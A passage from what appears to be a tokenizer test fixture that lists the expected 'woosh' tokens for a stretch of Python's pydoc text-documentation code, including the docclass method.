woosh.Token(woosh.OP, '=', 1288, 19, 1288, 20),
woosh.Token(woosh.NAME, 'result', 1288, 21, 1288, 27),
woosh.Token(woosh.OP, '+', 1288, 28, 1288, 29),
woosh.Token(woosh.NAME, 'self', 1288, 30, 1288, 34),
woosh.Token(woosh.OP, '.', 1288, 34, 1288, 35),
woosh.Token(woosh.NAME, 'section', 1288, 35, 1288, 42),
woosh.Token(woosh.OP, '(', 1288, 42, 1288, 43),
woosh.Token(woosh.STRING, "'DATE'", 1288, 43, 1288, 49),
woosh.Token(woosh.OP, ',', 1288, 49, 1288, 50),
woosh.Token(woosh.NAME, 'str', 1288, 51, 1288, 54),
woosh.Token(woosh.OP, '(', 1288, 54, 1288, 55),
woosh.Token(woosh.NAME, 'object', 1288, 55, 1288, 61),
woosh.Token(woosh.OP, '.', 1288, 61, 1288, 62),
woosh.Token(woosh.NAME, '__date__', 1288, 62, 1288, 70),
woosh.Token(woosh.OP, ')', 1288, 70, 1288, 71),
woosh.Token(woosh.OP, ')', 1288, 71, 1288, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1288, 72, 1289, 0),
woosh.Token(woosh.DEDENT, ' ', 1289, 0, 1289, 8),
woosh.Token(woosh.NAME, 'if', 1289, 8, 1289, 10),
woosh.Token(woosh.NAME, 'hasattr', 1289, 11, 1289, 18),
woosh.Token(woosh.OP, '(', 1289, 18, 1289, 19),
woosh.Token(woosh.NAME, 'object', 1289, 19, 1289, 25),
woosh.Token(woosh.OP, ',', 1289, 25, 1289, 26),
woosh.Token(woosh.STRING, "'__author__'", 1289, 27, 1289, 39),
woosh.Token(woosh.OP, ')', 1289, 39, 1289, 40),
woosh.Token(woosh.OP, ':', 1289, 40, 1289, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1289, 41, 1290, 0),
woosh.Token(woosh.INDENT, ' ', 1290, 0, 1290, 12),
woosh.Token(woosh.NAME, 'result', 1290, 12, 1290, 18),
woosh.Token(woosh.OP, '=', 1290, 19, 1290, 20),
woosh.Token(woosh.NAME, 'result', 1290, 21, 1290, 27),
woosh.Token(woosh.OP, '+', 1290, 28, 1290, 29),
woosh.Token(woosh.NAME, 'self', 1290, 30, 1290, 34),
woosh.Token(woosh.OP, '.', 1290, 34, 1290, 35),
woosh.Token(woosh.NAME, 'section', 1290, 35, 1290, 42),
woosh.Token(woosh.OP, '(', 1290, 42, 1290, 43),
woosh.Token(woosh.STRING, "'AUTHOR'", 1290, 43, 1290, 51),
woosh.Token(woosh.OP, ',', 1290, 51, 1290, 52),
woosh.Token(woosh.NAME, 'str', 1290, 53, 1290, 56),
woosh.Token(woosh.OP, '(', 1290, 56, 1290, 57),
woosh.Token(woosh.NAME, 'object', 1290, 57, 1290, 63),
woosh.Token(woosh.OP, '.', 1290, 63, 1290, 64),
woosh.Token(woosh.NAME, '__author__', 1290, 64, 1290, 74),
woosh.Token(woosh.OP, ')', 1290, 74, 1290, 75),
woosh.Token(woosh.OP, ')', 1290, 75, 1290, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 1290, 76, 1291, 0),
woosh.Token(woosh.DEDENT, ' ', 1291, 0, 1291, 8),
woosh.Token(woosh.NAME, 'if', 1291, 8, 1291, 10),
woosh.Token(woosh.NAME, 'hasattr', 1291, 11, 1291, 18),
woosh.Token(woosh.OP, '(', 1291, 18, 1291, 19),
woosh.Token(woosh.NAME, 'object', 1291, 19, 1291, 25),
woosh.Token(woosh.OP, ',', 1291, 25, 1291, 26),
woosh.Token(woosh.STRING, "'__credits__'", 1291, 27, 1291, 40),
woosh.Token(woosh.OP, ')', 1291, 40, 1291, 41),
woosh.Token(woosh.OP, ':', 1291, 41, 1291, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1291, 42, 1292, 0),
woosh.Token(woosh.INDENT, ' ', 1292, 0, 1292, 12),
woosh.Token(woosh.NAME, 'result', 1292, 12, 1292, 18),
woosh.Token(woosh.OP, '=', 1292, 19, 1292, 20),
woosh.Token(woosh.NAME, 'result', 1292, 21, 1292, 27),
woosh.Token(woosh.OP, '+', 1292, 28, 1292, 29),
woosh.Token(woosh.NAME, 'self', 1292, 30, 1292, 34),
woosh.Token(woosh.OP, '.', 1292, 34, 1292, 35),
woosh.Token(woosh.NAME, 'section', 1292, 35, 1292, 42),
woosh.Token(woosh.OP, '(', 1292, 42, 1292, 43),
woosh.Token(woosh.STRING, "'CREDITS'", 1292, 43, 1292, 52),
woosh.Token(woosh.OP, ',', 1292, 52, 1292, 53),
woosh.Token(woosh.NAME, 'str', 1292, 54, 1292, 57),
woosh.Token(woosh.OP, '(', 1292, 57, 1292, 58),
woosh.Token(woosh.NAME, 'object', 1292, 58, 1292, 64),
woosh.Token(woosh.OP, '.', 1292, 64, 1292, 65),
woosh.Token(woosh.NAME, '__credits__', 1292, 65, 1292, 76),
woosh.Token(woosh.OP, ')', 1292, 76, 1292, 77),
woosh.Token(woosh.OP, ')', 1292, 77, 1292, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 1292, 78, 1293, 0),
woosh.Token(woosh.DEDENT, ' ', 1293, 0, 1293, 8),
woosh.Token(woosh.NAME, 'try', 1293, 8, 1293, 11),
woosh.Token(woosh.OP, ':', 1293, 11, 1293, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1293, 12, 1294, 0),
woosh.Token(woosh.INDENT, ' ', 1294, 0, 1294, 12),
woosh.Token(woosh.NAME, 'file', 1294, 12, 1294, 16),
woosh.Token(woosh.OP, '=', 1294, 17, 1294, 18),
woosh.Token(woosh.NAME, 'inspect', 1294, 19, 1294, 26),
woosh.Token(woosh.OP, '.', 1294, 26, 1294, 27),
woosh.Token(woosh.NAME, 'getabsfile', 1294, 27, 1294, 37),
woosh.Token(woosh.OP, '(', 1294, 37, 1294, 38),
woosh.Token(woosh.NAME, 'object', 1294, 38, 1294, 44),
woosh.Token(woosh.OP, ')', 1294, 44, 1294, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1294, 45, 1295, 0),
woosh.Token(woosh.DEDENT, ' ', 1295, 0, 1295, 8),
woosh.Token(woosh.NAME, 'except', 1295, 8, 1295, 14),
woosh.Token(woosh.NAME, 'TypeError', 1295, 15, 1295, 24),
woosh.Token(woosh.OP, ':', 1295, 24, 1295, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 1295, 25, 1296, 0),
woosh.Token(woosh.INDENT, ' ', 1296, 0, 1296, 12),
woosh.Token(woosh.NAME, 'file', 1296, 12, 1296, 16),
woosh.Token(woosh.OP, '=', 1296, 17, 1296, 18),
woosh.Token(woosh.STRING, "'(built-in)'", 1296, 19, 1296, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1296, 31, 1297, 0),
woosh.Token(woosh.DEDENT, ' ', 1297, 0, 1297, 8),
woosh.Token(woosh.NAME, 'result', 1297, 8, 1297, 14),
woosh.Token(woosh.OP, '=', 1297, 15, 1297, 16),
woosh.Token(woosh.NAME, 'result', 1297, 17, 1297, 23),
woosh.Token(woosh.OP, '+', 1297, 24, 1297, 25),
woosh.Token(woosh.NAME, 'self', 1297, 26, 1297, 30),
woosh.Token(woosh.OP, '.', 1297, 30, 1297, 31),
woosh.Token(woosh.NAME, 'section', 1297, 31, 1297, 38),
woosh.Token(woosh.OP, '(', 1297, 38, 1297, 39),
woosh.Token(woosh.STRING, "'FILE'", 1297, 39, 1297, 45),
woosh.Token(woosh.OP, ',', 1297, 45, 1297, 46),
woosh.Token(woosh.NAME, 'file', 1297, 47, 1297, 51),
woosh.Token(woosh.OP, ')', 1297, 51, 1297, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1297, 52, 1298, 0),
woosh.Token(woosh.NAME, 'return', 1298, 8, 1298, 14),
woosh.Token(woosh.NAME, 'result', 1298, 15, 1298, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1298, 21, 1299, 0),
woosh.Token(woosh.DEDENT, ' ', 1300, 0, 1300, 4),
woosh.Token(woosh.NAME, 'def', 1300, 4, 1300, 7),
woosh.Token(woosh.NAME, 'docclass', 1300, 8, 1300, 16),
woosh.Token(woosh.OP, '(', 1300, 16, 1300, 17),
woosh.Token(woosh.NAME, 'self', 1300, 17, 1300, 21),
woosh.Token(woosh.OP, ',', 1300, 21, 1300, 22),
woosh.Token(woosh.NAME, 'object', 1300, 23, 1300, 29),
woosh.Token(woosh.OP, ',', 1300, 29, 1300, 30),
woosh.Token(woosh.NAME, 'name', 1300, 31, 1300, 35),
woosh.Token(woosh.OP, '=', 1300, 35, 1300, 36),
woosh.Token(woosh.NAME, 'None', 1300, 36, 1300, 40),
woosh.Token(woosh.OP, ',', 1300, 40, 1300, 41),
woosh.Token(woosh.NAME, 'mod', 1300, 42, 1300, 45),
woosh.Token(woosh.OP, '=', 1300, 45, 1300, 46),
woosh.Token(woosh.NAME, 'None', 1300, 46, 1300, 50),
woosh.Token(woosh.OP, ',', 1300, 50, 1300, 51),
woosh.Token(woosh.OP, '*', 1300, 52, 1300, 53),
woosh.Token(woosh.NAME, 'ignored', 1300, 53, 1300, 60),
woosh.Token(woosh.OP, ')', 1300, 60, 1300, 61),
woosh.Token(woosh.OP, ':', 1300, 61, 1300, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 1300, 62, 1301, 0),
woosh.Token(woosh.INDENT, ' ', 1301, 0, 1301, 8),
woosh.Token(woosh.STRING, '"""Produce text documentation for a given class object."""', 1301, 8, 1301, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 1301, 66, 1302, 0),
woosh.Token(woosh.NAME, 'realname', 1302, 8, 1302, 16),
woosh.Token(woosh.OP, '=', 1302, 17, 1302, 18),
woosh.Token(woosh.NAME, 'object', 1302, 19, 1302, 25),
woosh.Token(woosh.OP, '.', 1302, 25, 1302, 26),
woosh.Token(woosh.NAME, '__name__', 1302, 26, 1302, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1302, 34, 1303, 0),
woosh.Token(woosh.NAME, 'name', 1303, 8, 1303, 12),
woosh.Token(woosh.OP, '=', 1303, 13, 1303, 14),
woosh.Token(woosh.NAME, 'name', 1303, 15, 1303, 19),
woosh.Token(woosh.NAME, 'or', 1303, 20, 1303, 22),
woosh.Token(woosh.NAME, 'realname', 1303, 23, 1303, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1303, 31, 1304, 0),
woosh.Token(woosh.NAME, 'bases', 1304, 8, 1304, 13),
woosh.Token(woosh.OP, '=', 1304, 14, 1304, 15),
woosh.Token(woosh.NAME, 'object', 1304, 16, 1304, 22),
woosh.Token(woosh.OP, '.', 1304, 22, 1304, 23),
woosh.Token(woosh.NAME, '__bases__', 1304, 23, 1304, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1304, 32, 1305, 0),
woosh.Token(woosh.NAME, 'def', 1306, 8, 1306, 11),
woosh.Token(woosh.NAME, 'makename', 1306, 12, 1306, 20),
woosh.Token(woosh.OP, '(', 1306, 20, 1306, 21),
woosh.Token(woosh.NAME, 'c', 1306, 21, 1306, 22),
woosh.Token(woosh.OP, ',', 1306, 22, 1306, 23),
woosh.Token(woosh.NAME, 'm', 1306, 24, 1306, 25),
woosh.Token(woosh.OP, '=', 1306, 25, 1306, 26),
woosh.Token(woosh.NAME, 'object', 1306, 26, 1306, 32),
woosh.Token(woosh.OP, '.', 1306, 32, 1306, 33),
woosh.Token(woosh.NAME, '__module__', 1306, 33, 1306, 43),
woosh.Token(woosh.OP, ')', 1306, 43, 1306, 44),
woosh.Token(woosh.OP, ':', 1306, 44, 1306, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1306, 45, 1307, 0),
woosh.Token(woosh.INDENT, ' ', 1307, 0, 1307, 12),
woosh.Token(woosh.NAME, 'return', 1307, 12, 1307, 18),
woosh.Token(woosh.NAME, 'classname', 1307, 19, 1307, 28),
woosh.Token(woosh.OP, '(', 1307, 28, 1307, 29),
woosh.Token(woosh.NAME, 'c', 1307, 29, 1307, 30),
woosh.Token(woosh.OP, ',', 1307, 30, 1307, 31),
woosh.Token(woosh.NAME, 'm', 1307, 32, 1307, 33),
woosh.Token(woosh.OP, ')', 1307, 33, 1307, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1307, 34, 1308, 0),
woosh.Token(woosh.DEDENT, ' ', 1309, 0, 1309, 8),
woosh.Token(woosh.NAME, 'if', 1309, 8, 1309, 10),
woosh.Token(woosh.NAME, 'name', 1309, 11, 1309, 15),
woosh.Token(woosh.OP, '==', 1309, 16, 1309, 18),
woosh.Token(woosh.NAME, 'realname', 1309, 19, 1309, 27),
woosh.Token(woosh.OP, ':', 1309, 27, 1309, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1309, 28, 1310, 0),
woosh.Token(woosh.INDENT, ' ', 1310, 0, 1310, 12),
woosh.Token(woosh.NAME, 'title', 1310, 12, 1310, 17),
woosh.Token(woosh.OP, '=', 1310, 18, 1310, 19),
woosh.Token(woosh.STRING, "'class '", 1310, 20, 1310, 28),
woosh.Token(woosh.OP, '+', 1310, 29, 1310, 30),
woosh.Token(woosh.NAME, 'self', 1310, 31, 1310, 35),
woosh.Token(woosh.OP, '.', 1310, 35, 1310, 36),
woosh.Token(woosh.NAME, 'bold', 1310, 36, 1310, 40),
woosh.Token(woosh.OP, '(', 1310, 40, 1310, 41),
woosh.Token(woosh.NAME, 'realname', 1310, 41, 1310, 49),
woosh.Token(woosh.OP, ')', 1310, 49, 1310, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 1310, 50, 1311, 0),
woosh.Token(woosh.DEDENT, ' ', 1311, 0, 1311, 8),
woosh.Token(woosh.NAME, 'else', 1311, 8, 1311, 12),
woosh.Token(woosh.OP, ':', 1311, 12, 1311, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1311, 13, 1312, 0),
woosh.Token(woosh.INDENT, ' ', 1312, 0, 1312, 12),
woosh.Token(woosh.NAME, 'title', 1312, 12, 1312, 17),
woosh.Token(woosh.OP, '=', 1312, 18, 1312, 19),
woosh.Token(woosh.NAME, 'self', 1312, 20, 1312, 24),
woosh.Token(woosh.OP, '.', 1312, 24, 1312, 25),
woosh.Token(woosh.NAME, 'bold', 1312, 25, 1312, 29),
woosh.Token(woosh.OP, '(', 1312, 29, 1312, 30),
woosh.Token(woosh.NAME, 'name', 1312, 30, 1312, 34),
woosh.Token(woosh.OP, ')', 1312, 34, 1312, 35),
woosh.Token(woosh.OP, '+', 1312, 36, 1312, 37),
woosh.Token(woosh.STRING, "' = class '", 1312, 38, 1312, 49),
woosh.Token(woosh.OP, '+', 1312, 50, 1312, 51),
woosh.Token(woosh.NAME, 'realname', 1312, 52, 1312, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 1312, 60, 1313, 0),
woosh.Token(woosh.DEDENT, ' ', 1313, 0, 1313, 8),
woosh.Token(woosh.NAME, 'if', 1313, 8, 1313, 10),
woosh.Token(woosh.NAME, 'bases', 1313, 11, 1313, 16),
woosh.Token(woosh.OP, ':', 1313, 16, 1313, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1313, 17, 1314, 0),
woosh.Token(woosh.INDENT, ' ', 1314, 0, 1314, 12),
woosh.Token(woosh.NAME, 'parents', 1314, 12, 1314, 19),
woosh.Token(woosh.OP, '=', 1314, 20, 1314, 21),
woosh.Token(woosh.NAME, 'map', 1314, 22, 1314, 25),
woosh.Token(woosh.OP, '(', 1314, 25, 1314, 26),
woosh.Token(woosh.NAME, 'makename', 1314, 26, 1314, 34),
woosh.Token(woosh.OP, ',', 1314, 34, 1314, 35),
woosh.Token(woosh.NAME, 'bases', 1314, 36, 1314, 41),
woosh.Token(woosh.OP, ')', 1314, 41, 1314, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 1314, 42, 1315, 0),
woosh.Token(woosh.NAME, 'title', 1315, 12, 1315, 17),
woosh.Token(woosh.OP, '=', 1315, 18, 1315, 19),
woosh.Token(woosh.NAME, 'title', 1315, 20, 1315, 25),
woosh.Token(woosh.OP, '+', 1315, 26, 1315, 27),
woosh.Token(woosh.STRING, "'(%s)'", 1315, 28, 1315, 34),
woosh.Token(woosh.OP, '%', 1315, 35, 1315, 36),
woosh.Token(woosh.STRING, "', '", 1315, 37, 1315, 41),
woosh.Token(woosh.OP, '.', 1315, 41, 1315, 42),
woosh.Token(woosh.NAME, 'join', 1315, 42, 1315, 46),
woosh.Token(woosh.OP, '(', 1315, 46, 1315, 47),
woosh.Token(woosh.NAME, 'parents', 1315, 47, 1315, 54),
woosh.Token(woosh.OP, ')', 1315, 54, 1315, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1315, 55, 1316, 0),
woosh.Token(woosh.DEDENT, ' ', 1317, 0, 1317, 8),
woosh.Token(woosh.NAME, 'contents', 1317, 8, 1317, 16),
woosh.Token(woosh.OP, '=', 1317, 17, 1317, 18),
woosh.Token(woosh.OP, '[', 1317, 19, 1317, 20),
woosh.Token(woosh.OP, ']', 1317, 20, 1317, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1317, 21, 1318, 0),
woosh.Token(woosh.NAME, 'push', 1318, 8, 1318, 12),
woosh.Token(woosh.OP, '=', 1318, 13, 1318, 14),
woosh.Token(woosh.NAME, 'contents', 1318, 15, 1318, 23),
woosh.Token(woosh.OP, '.', 1318, 23, 1318, 24),
woosh.Token(woosh.NAME, 'append', 1318, 24, 1318, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1318, 30, 1319, 0),
woosh.Token(woosh.NAME, 'try', 1320, 8, 1320, 11),
woosh.Token(woosh.OP, ':', 1320, 11, 1320, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1320, 12, 1321, 0),
woosh.Token(woosh.INDENT, ' ', 1321, 0, 1321, 12),
woosh.Token(woosh.NAME, 'signature', 1321, 12, 1321, 21),
woosh.Token(woosh.OP, '=', 1321, 22, 1321, 23),
woosh.Token(woosh.NAME, 'inspect', 1321, 24, 1321, 31),
woosh.Token(woosh.OP, '.', 1321, 31, 1321, 32),
woosh.Token(woosh.NAME, 'signature', 1321, 32, 1321, 41),
woosh.Token(woosh.OP, '(', 1321, 41, 1321, 42),
woosh.Token(woosh.NAME, 'object', 1321, 42, 1321, 48),
woosh.Token(woosh.OP, ')', 1321, 48, 1321, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1321, 49, 1322, 0),
woosh.Token(woosh.DEDENT, ' ', 1322, 0, 1322, 8),
woosh.Token(woosh.NAME, 'except', 1322, 8, 1322, 14),
woosh.Token(woosh.OP, '(', 1322, 15, 1322, 16),
woosh.Token(woosh.NAME, 'ValueError', 1322, 16, 1322, 26),
woosh.Token(woosh.OP, ',', 1322, 26, 1322, 27),
woosh.Token(woosh.NAME, 'TypeError', 1322, 28, 1322, 37),
woosh.Token(woosh.OP, ')', 1322, 37, 1322, 38),
woosh.Token(woosh.OP, ':', 1322, 38, 1322, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1322, 39, 1323, 0),
woosh.Token(woosh.INDENT, ' ', 1323, 0, 1323, 12),
woosh.Token(woosh.NAME, 'signature', 1323, 12, 1323, 21),
woosh.Token(woosh.OP, '=', 1323, 22, 1323, 23),
woosh.Token(woosh.NAME, 'None', 1323, 24, 1323, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1323, 28, 1324, 0),
woosh.Token(woosh.DEDENT, ' ', 1324, 0, 1324, 8),
woosh.Token(woosh.NAME, 'if', 1324, 8, 1324, 10),
woosh.Token(woosh.NAME, 'signature', 1324, 11, 1324, 20),
woosh.Token(woosh.OP, ':', 1324, 20, 1324, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1324, 21, 1325, 0),
woosh.Token(woosh.INDENT, ' ', 1325, 0, 1325, 12),
woosh.Token(woosh.NAME, 'argspec', 1325, 12, 1325, 19),
woosh.Token(woosh.OP, '=', 1325, 20, 1325, 21),
woosh.Token(woosh.NAME, 'str', 1325, 22, 1325, 25),
woosh.Token(woosh.OP, '(', 1325, 25, 1325, 26),
woosh.Token(woosh.NAME, 'signature', 1325, 26, 1325, 35),
woosh.Token(woosh.OP, ')', 1325, 35, 1325, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1325, 36, 1326, 0),
woosh.Token(woosh.NAME, 'if', 1326, 12, 1326, 14),
woosh.Token(woosh.NAME, 'argspec', 1326, 15, 1326, 22),
woosh.Token(woosh.NAME, 'and', 1326, 23, 1326, 26),
woosh.Token(woosh.NAME, 'argspec', 1326, 27, 1326, 34),
woosh.Token(woosh.OP, '!=', 1326, 35, 1326, 37),
woosh.Token(woosh.STRING, "'()'", 1326, 38, 1326, 42),
woosh.Token(woosh.OP, ':', 1326, 42, 1326, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1326, 43, 1327, 0),
woosh.Token(woosh.INDENT, ' ', 1327, 0, 1327, 16),
woosh.Token(woosh.NAME, 'push', 1327, 16, 1327, 20),
woosh.Token(woosh.OP, '(', 1327, 20, 1327, 21),
woosh.Token(woosh.NAME, 'name', 1327, 21, 1327, 25),
woosh.Token(woosh.OP, '+', 1327, 26, 1327, 27),
woosh.Token(woosh.NAME, 'argspec', 1327, 28, 1327, 35),
woosh.Token(woosh.OP, '+', 1327, 36, 1327, 37),
woosh.Token(woosh.STRING, "'\\n'", 1327, 38, 1327, 42),
woosh.Token(woosh.OP, ')', 1327, 42, 1327, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1327, 43, 1328, 0),
woosh.Token(woosh.DEDENT, ' ', 1329, 0, 1329, 8),
woosh.Token(woosh.DEDENT, '', 1329, 8, 1329, 8),
woosh.Token(woosh.NAME, 'doc', 1329, 8, 1329, 11),
woosh.Token(woosh.OP, '=', 1329, 12, 1329, 13),
woosh.Token(woosh.NAME, 'getdoc', 1329, 14, 1329, 20),
woosh.Token(woosh.OP, '(', 1329, 20, 1329, 21),
woosh.Token(woosh.NAME, 'object', 1329, 21, 1329, 27),
woosh.Token(woosh.OP, ')', 1329, 27, 1329, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1329, 28, 1330, 0),
woosh.Token(woosh.NAME, 'if', 1330, 8, 1330, 10),
woosh.Token(woosh.NAME, 'doc', 1330, 11, 1330, 14),
woosh.Token(woosh.OP, ':', 1330, 14, 1330, 15),
woosh.Token(woosh.NEWLINE, '\r\n', 1330, 15, 1331, 0),
woosh.Token(woosh.INDENT, ' ', 1331, 0, 1331, 12),
woosh.Token(woosh.NAME, 'push', 1331, 12, 1331, 16),
woosh.Token(woosh.OP, '(', 1331, 16, 1331, 17),
woosh.Token(woosh.NAME, 'doc', 1331, 17, 1331, 20),
woosh.Token(woosh.OP, '+', 1331, 21, 1331, 22),
woosh.Token(woosh.STRING, "'\\n'", 1331, 23, 1331, 27),
woosh.Token(woosh.OP, ')', 1331, 27, 1331, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1331, 28, 1332, 0),
woosh.Token(woosh.COMMENT, '# List the mro, if non-trivial.', 1333, 8, 1333, 39),
woosh.Token(woosh.DEDENT, ' ', 1334, 0, 1334, 8),
woosh.Token(woosh.NAME, 'mro', 1334, 8, 1334, 11),
woosh.Token(woosh.OP, '=', 1334, 12, 1334, 13),
woosh.Token(woosh.NAME, 'deque', 1334, 14, 1334, 19),
woosh.Token(woosh.OP, '(', 1334, 19, 1334, 20),
woosh.Token(woosh.NAME, 'inspect', 1334, 20, 1334, 27),
woosh.Token(woosh.OP, '.', 1334, 27, 1334, 28),
woosh.Token(woosh.NAME, 'getmro', 1334, 28, 1334, 34),
woosh.Token(woosh.OP, '(', 1334, 34, 1334, 35),
woosh.Token(woosh.NAME, 'object', 1334, 35, 1334, 41),
woosh.Token(woosh.OP, ')', 1334, 41, 1334, 42),
woosh.Token(woosh.OP, ')', 1334, 42, 1334, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1334, 43, 1335, 0),
woosh.Token(woosh.NAME, 'if', 1335, 8, 1335, 10),
woosh.Token(woosh.NAME, 'len', 1335, 11, 1335, 14),
woosh.Token(woosh.OP, '(', 1335, 14, 1335, 15),
woosh.Token(woosh.NAME, 'mro', 1335, 15, 1335, 18),
woosh.Token(woosh.OP, ')', 1335, 18, 1335, 19),
woosh.Token(woosh.OP, '>', 1335, 20, 1335, 21),
woosh.Token(woosh.NUMBER, '2', 1335, 22, 1335, 23),
woosh.Token(woosh.OP, ':', 1335, 23, 1335, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1335, 24, 1336, 0),
woosh.Token(woosh.INDENT, ' ', 1336, 0, 1336, 12),
woosh.Token(woosh.NAME, 'push', 1336, 12, 1336, 16),
woosh.Token(woosh.OP, '(', 1336, 16, 1336, 17),
woosh.Token(woosh.STRING, '"Method resolution order:"', 1336, 17, 1336, 43),
woosh.Token(woosh.OP, ')', 1336, 43, 1336, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 1336, 44, 1337, 0),
woosh.Token(woosh.NAME, 'for', 1337, 12, 1337, 15),
woosh.Token(woosh.NAME, 'base', 1337, 16, 1337, 20),
woosh.Token(woosh.NAME, 'in', 1337, 21, 1337, 23),
woosh.Token(woosh.NAME, 'mro', 1337, 24, 1337, 27),
woosh.Token(woosh.OP, ':', 1337, 27, 1337, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1337, 28, 1338, 0),
woosh.Token(woosh.INDENT, ' ', 1338, 0, 1338, 16),
woosh.Token(woosh.NAME, 'push', 1338, 16, 1338, 20),
woosh.Token(woosh.OP, '(', 1338, 20, 1338, 21),
woosh.Token(woosh.STRING, "' '", 1338, 21, 1338, 27),
woosh.Token(woosh.OP, '+', 1338, 28, 1338, 29),
woosh.Token(woosh.NAME, 'makename', 1338, 30, 1338, 38),
woosh.Token(woosh.OP, '(', 1338, 38, 1338, 39),
woosh.Token(woosh.NAME, 'base', 1338, 39, 1338, 43),
woosh.Token(woosh.OP, ')', 1338, 43, 1338, 44),
woosh.Token(woosh.OP, ')', 1338, 44, 1338, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 1338, 45, 1339, 0),
woosh.Token(woosh.DEDENT, ' ', 1339, 0, 1339, 12),
woosh.Token(woosh.NAME, 'push', 1339, 12, 1339, 16),
woosh.Token(woosh.OP, '(', 1339, 16, 1339, 17),
woosh.Token(woosh.STRING, "''", 1339, 17, 1339, 19),
woosh.Token(woosh.OP, ')', 1339, 19, 1339, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1339, 20, 1340, 0),
woosh.Token(woosh.COMMENT, '# List the built-in subclasses, if any:', 1341, 8, 1341, 47),
woosh.Token(woosh.DEDENT, ' ', 1342, 0, 1342, 8),
woosh.Token(woosh.NAME, 'subclasses', 1342, 8, 1342, 18),
woosh.Token(woosh.OP, '=', 1342, 19, 1342, 20),
woosh.Token(woosh.NAME, 'sorted', 1342, 21, 1342, 27),
woosh.Token(woosh.OP, '(', 1342, 27, 1342, 28),
woosh.Token(woosh.OP, '(', 1343, 12, 1343, 13),
woosh.Token(woosh.NAME, 'str', 1343, 13, 1343, 16),
woosh.Token(woosh.OP, '(', 1343, 16, 1343, 17),
woosh.Token(woosh.NAME, 'cls', 1343, 17, 1343, 20),
woosh.Token(woosh.OP, '.', 1343, 20, 1343, 21),
woosh.Token(woosh.NAME, '__name__', 1343, 21, 1343, 29),
woosh.Token(woosh.OP, ')', 1343, 29, 1343, 30),
woosh.Token(woosh.NAME, 'for', 1343, 31, 1343, 34),
woosh.Token(woosh.NAME, 'cls', 1343, 35, 1343, 38),
woosh.Token(woosh.NAME, 'in', 1343, 39, 1343, 41),
woosh.Token(woosh.NAME, 'type', 1343, 42, 1343, 46),
woosh.Token(woosh.OP, '.', 1343, 46, 1343, 47),
woosh.Token(woosh.NAME, '__subclasses__', 1343, 47, 1343, 61),
woosh.Token(woosh.OP, '(', 1343, 61, 1343, 62),
woosh.Token(woosh.NAME, 'object', 1343, 62, 1343, 68),
woosh.Token(woosh.OP, ')', 1343, 68, 1343, 69),
woosh.Token(woosh.NAME, 'if', 1344, 13, 1344, 15),
woosh.Token(woosh.NAME, 'not', 1344, 16, 1344, 19),
woosh.Token(woosh.NAME, 'cls', 1344, 20, 1344, 23),
woosh.Token(woosh.OP, '.', 1344, 23, 1344, 24),
woosh.Token(woosh.NAME, '__name__', 1344, 24, 1344, 32),
woosh.Token(woosh.OP, '.', 1344, 32, 1344, 33),
woosh.Token(woosh.NAME, 'startswith', 1344, 33, 1344, 43),
woosh.Token(woosh.OP, '(', 1344, 43, 1344, 44),
woosh.Token(woosh.STRING, '"_"', 1344, 44, 1344, 47),
woosh.Token(woosh.OP, ')', 1344, 47, 1344, 48),
woosh.Token(woosh.NAME, 'and', 1344, 49, 1344, 52),
woosh.Token(woosh.NAME, 'cls', 1344, 53, 1344, 56),
woosh.Token(woosh.OP, '.', 1344, 56, 1344, 57),
woosh.Token(woosh.NAME, '__module__', 1344, 57, 1344, 67),
woosh.Token(woosh.OP, '==', 1344, 68, 1344, 70),
woosh.Token(woosh.STRING, '"builtins"', 1344, 71, 1344, 81),
woosh.Token(woosh.OP, ')', 1344, 81, 1344, 82),
woosh.Token(woosh.OP, ',', 1344, 82, 1344, 83),
woosh.Token(woosh.NAME, 'key', 1345, 12, 1345, 15),
woosh.Token(woosh.OP, '=', 1345, 15, 1345, 16),
woosh.Token(woosh.NAME, 'str', 1345, 16, 1345, 19),
woosh.Token(woosh.OP, '.', 1345, 19, 1345, 20),
woosh.Token(woosh.NAME, 'lower', 1345, 20, 1345, 25),
woosh.Token(woosh.OP, ')', 1346, 8, 1346, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 1346, 9, 1347, 0),
woosh.Token(woosh.NAME, 'no_of_subclasses', 1347, 8, 1347, 24),
woosh.Token(woosh.OP, '=', 1347, 25, 1347, 26),
